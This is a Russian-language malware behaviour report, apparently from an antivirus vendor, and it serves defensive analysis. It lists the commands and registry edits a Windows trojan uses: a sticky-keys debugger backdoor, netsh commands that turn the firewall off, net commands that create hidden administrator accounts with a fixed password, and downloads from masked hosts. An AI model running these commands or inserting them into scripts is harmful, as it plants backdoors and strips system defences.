Техническая информация
Для обеспечения автозапуска и распространения:
Модифицирует следующие ключи реестра:
- [<HKLM>\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\utilman.exe] 'Debugger' = '<SYSTEM32>\cmd.exe'
- [<HKLM>\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\sethc.exe] 'Debugger' = '<SYSTEM32>\cmd.exe'
Вредоносные функции:
Для обхода брандмауэра удаляет или модифицирует следующие ключи реестра:
- [<HKLM>\SYSTEM\ControlSet001\Services\SharedAccess\Parameters\FirewallPolicy\StandardProfile] 'DoNotAllowExceptions' = '00000000'
- [<HKLM>\SYSTEM\ControlSet001\Services\SharedAccess\Parameters\FirewallPolicy\StandardProfile] 'EnableFirewall' = '00000000'
Создает и запускает на исполнение:
- '' (загружен из сети Интернет)
Запускает на исполнение:
- '<SYSTEM32>\netsh.exe' firewall set opmode Disable
Изменения в файловой системе:
Создает следующие файлы:
- <SYSTEM32>\wbem\AutoRecover\C8463ECBE33BC240263A0B094E46D510.mof
- %TEMP%\netbeg32.exe
- %TEMP%\tmp5.tmp
- %TEMP%\tmp6.tmp
- <SYSTEM32>\wbem\AutoRecover\23BDE61F1F4FACE17E9B0C01F2A1FD9B.mof
- %TEMP%\tmp2.tmp
- %TEMP%\tmp1.tmp
- %TEMP%\tmp3.tmp
- %TEMP%\gatss2.ini
- %TEMP%\tmp4.tmp
Удаляет следующие файлы:
- %TEMP%\tmp5.tmp
- %TEMP%\tmp4.tmp
- %TEMP%\tmp6.tmp
- %TEMP%\tmp1.tmp
- %TEMP%\tmp3.tmp
- %TEMP%\tmp2.tmp
Сетевая активность:
Подключается к:
- 'uc####anglicky.sk':80
- 'ji#y.tw':80
TCP:
Запросы HTTP GET:
- http://uc####anglicky.sk/img/save3.png
- http://www.ji#y.tw/images/_tw/wn04.jpg via ji#y.tw
UDP:
- DNS ASK uc####anglicky.sk
- DNS ASK www.ji#y.tw
Другое:
Создает и запускает на исполнение:
- '%TEMP%\netbeg32.exe'
Запускает на исполнение:
- '<SYSTEM32>\net1.exe' localgroup administrators server_sys /add
- '<SYSTEM32>\net.exe' localgroup administrators server_sys /add
- '<SYSTEM32>\net1.exe' localgroup "remote desktop users" server_sys /add
- '<SYSTEM32>\net.exe' localgroup "remote desktop users" server_sys /add
- '<SYSTEM32>\net.exe' user server_sys h3lp1desk /expires:never /add
- '<SYSTEM32>\cmd.exe' /C "wmic path Win32_UserAccount where Name="AstNet" set PasswordExpires=false"
- '<SYSTEM32>\net1.exe' user server_sys h3lp1desk /expires:never /add
- '<SYSTEM32>\net1.exe' user AstNet h3lp1desk
- '<SYSTEM32>\net.exe' group "domain admins" server_sys /add
- '<SYSTEM32>\net.exe' user server_sys h3lp1desk
- '<SYSTEM32>\net1.exe' user server_sys /expires:never
- '<SYSTEM32>\net1.exe' user server_sys h3lp1desk
- '<SYSTEM32>\cmd.exe' /C "wmic path Win32_UserAccount where Name="server_sys" set PasswordExpires=false"
- '<SYSTEM32>\net.exe' user server_sys /active:yes
- '<SYSTEM32>\net1.exe' group "domain admins" server_sys /add
- '<SYSTEM32>\net.exe' user server_sys /expires:never
- '<SYSTEM32>\net1.exe' user server_sys /active:yes
- '<SYSTEM32>\net.exe' user AstNet h3lp1desk
- '<SYSTEM32>\netsh.exe' advfirewall set currentprofile state off
- '<SYSTEM32>\netsh.exe' advfirewall set allprofiles state off
- '<SYSTEM32>\net.exe' localgroup administrators AstNet /add
- '<SYSTEM32>\net1.exe' user AstNet h3lp1desk /expires:never /add
- '<SYSTEM32>\cmd.exe' /c netsh advfirewall set currentprofile state off
- '<SYSTEM32>\cmd.exe' /c netsh firewall set opmode Disable
- '<SYSTEM32>\net.exe' user AstNet h3lp1desk /expires:never /add
- '<SYSTEM32>\cmd.exe' /c netsh advfirewall set allprofiles state off
- '<SYSTEM32>\net1.exe' localgroup administrators AstNet /add
- '<SYSTEM32>\net1.exe' user AstNet /active:yes
- '<SYSTEM32>\net.exe' user AstNet /active:yes
- '<SYSTEM32>\net1.exe' user AstNet /expires:never
- '<SYSTEM32>\net.exe' user AstNet /expires:never
- '<SYSTEM32>\net1.exe' localgroup "remote desktop users" AstNet /add
- '<SYSTEM32>\net.exe' localgroup "remote desktop users" AstNet /add
- '<SYSTEM32>\net1.exe' group "domain admins" AstNet /add
- '<SYSTEM32>\net.exe' group "domain admins" AstNet /add
